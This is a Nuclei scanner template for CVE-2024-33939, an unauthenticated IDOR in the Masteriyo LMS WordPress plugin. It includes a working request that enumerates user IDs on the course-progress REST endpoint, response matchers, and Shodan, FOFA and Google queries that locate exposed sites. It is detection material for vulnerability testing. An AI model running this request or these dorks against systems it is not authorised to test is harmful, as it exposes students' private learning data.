id: CVE-2024-33939 info: name: Masteriyo LMS <= 1.7.3 - Insecure Direct Object Reference author: Sourabh-Sahu severity: medium description: | Authentication Bypass Using an Alternate Path or Channel vulnerability in Masteriyo Masteriyo - LMS. Unauth access to course progress.This issue affects Masteriyo - LMS: from n/a through 1.7.3. impact: | An unauthenticated attacker can access course progress and user learning data without logging in. remediation: | Update the Masteriyo LMS plugin to the latest version and enforce proper authentication and authorization checks on REST API endpoints. reference: - https://wpscan.com/vulnerability/57c0054a-b713-4f7c-8e41-c009b07624a6/ - https://nvd.nist.gov/vuln/detail/CVE-2024-33939 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-33939 cwe-id: CWE-288 epss-score: 0.07463 epss-percentile: 0.91905 cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:* metadata: verified: true max-request: 11 shodan-query: http.html:"/wp-content/plugins/learning-management-system/" fofa-query: body=/wp-content/plugins/learning-management-system/ google-query: inurl:"/wp-content/plugins/learning-management-system/" tags: cve,cve2024,wordpress,wp-plugin,lms,idor,unauth,learning-management-system,vkev http: - raw: - | GET /wp-json/masteriyo/v1/course-progress?user_id={{user}} HTTP/1.1 Host: {{Hostname}} payloads: user: - "1" - "2" - "3" - "4" - "5" - "6" - "7" - "8" - "9" - "10" attack: clusterbomb stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "\"course_id\":", "\"course_permalink\":", "\"status\":")' condition: and # digest: 4b0a00483046022100a185bdf9ccf30f7ed1f7f2cfd63140e6fd475483380e684e418e4853b3e37cd5022100c229dce3686871f2a0a020f869f6c334b7737faf2158489a0385b045377390ab:922c64590222798bb761d5b6d8e72950